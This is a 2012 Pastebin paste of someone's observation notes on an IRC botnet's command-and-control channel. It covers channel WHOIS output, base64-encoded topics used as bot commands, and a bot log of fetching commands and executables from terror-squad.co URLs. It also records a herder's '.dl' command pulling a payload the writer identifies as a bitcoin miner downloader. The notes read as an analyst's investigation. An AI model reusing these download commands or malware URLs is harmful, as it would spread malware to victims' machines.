SHARE
TWEET

Untitled

a guest Apr 24th, 2012 89 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. * Topic for #BV1 is: d3F6Q29zTyt3Nm5EcmNPb3dxekRwTU80dzdqRHZNSzJ3cVBDbzhPN3c3dkR1OEtpdzdqRHFjTyt3NzdEbzhPK3dxSER2OE85dzduRHJjT293cUxEcjhPandxUER1TU9qdzd6RHBjT3Z3cUxEdU1PMHc3akRzQT09fDk5ODYzMTQw
  2. * Topic for #BV1 set by BV1 at Thu Apr 19 06:40:09 2012
  3. * [BorBot] (BorBot@HTTP-AC028863.lsanca.fios.verizon.net): BorBot :BorBot
  4. * [BorBot] @#BV1
  5. * [BorBot] HTTP.1.1 :HTTP 1.1
  6. * [BorBot] is using a Secure Connection
  7. * [BorBot] idle 11:49:41, signon: Tue Apr 24 10:05:08
  8. * [BorBot] End of WHOIS list.
  9. * [BV1] (glmbrs@BV1): ...
  10. * [BV1] ~#BV1 ~#US
  11. * [BV1] HTTP.1.1 :HTTP 1.1
  12. * [BV1] is a Network Administrator
  13. * [BV1] is available for help.
  14. * [BV1] is using a Secure Connection
  15. * [BV1] idle 00:18:28, signon: Tue Apr 24 00:14:38
  16. * [BV1] End of WHOIS list.
  17.  
  18.  
  19. Topic for #us is: d3F6Q29zT213cXpDcjhPbHc2TER2OE80dzYzRG9NT2d3Ny9Ec0E9PXw5OTg2MzE0MA==
  20.  
  21. * Topic for #us set by Bv1 at Thu Mar 29 04:15:44 2012
  22.  
  23. we.be.thu.gs redirected to local server, and topics placed on correct channels.
  24. On join of #BV1, bot visited http://terror-squad.co/topic.txt
  25. Further encrypted topic in file: d3F6Q29zTzV3N3pDck1Pa3c3akR1TU84d3JiQ284S2p3N3ZEdThPN3dxTER1TU9wdzc3RHZzT2p3NzdDb2NPL3c3M0R1Y090dzZqQ29zT3Z3NlBDbzhPcXc2WERvTU9wd3I3Q29zT3B3N1REcWNLc3dyN0N0Y09xd3JuQ3VzSzF3NjNEcU1LOHdyN0N1OE91d3JUQ3Y4Syt3NnJEcjhPdnc2L0N2Y0svd3I3RHFjT3B3cnJDdXNPdHc2N0N1c0s3dzY3RHFNT3d3cXpDb3NPNXc3L0Ryc0tzdzZQRG9zT3d3cXpDb3NPL3c2UER2c080dzdEQ3JNS2l3NnJEdU1POHc3QT18OTk4NjMxNDA=
  26.  
  27. Bot then downloaded http://terror-squad.co/file2.exe, and joined #US, which was the country code received from the api.
  28.  
  29. <n{US|XP-32a}kjibmbk> Attempting to perform commands from url: http://www.terror-squad.co/topic.txt.
  30. <n{US|XP-32a}kjibmbk> Bot file is already up to date: 29F569AD027B832FCCC132EE66AB67BD == 29F569AD027B832FCCC132EE66AB67BD
  31.  
  32. New action, as I write this up.
  33. <BV1> .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
  34. That's a bot that attempts to download a bitcoin miner.
  35. http://malwr.com/analysis/c38456aa1b1f93fa9da88cb3653a6fd5/
  36. From http://api.cld.me/FoX8/download/bitcoin-miner.exe
  37. Too bad it's not there anymore.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top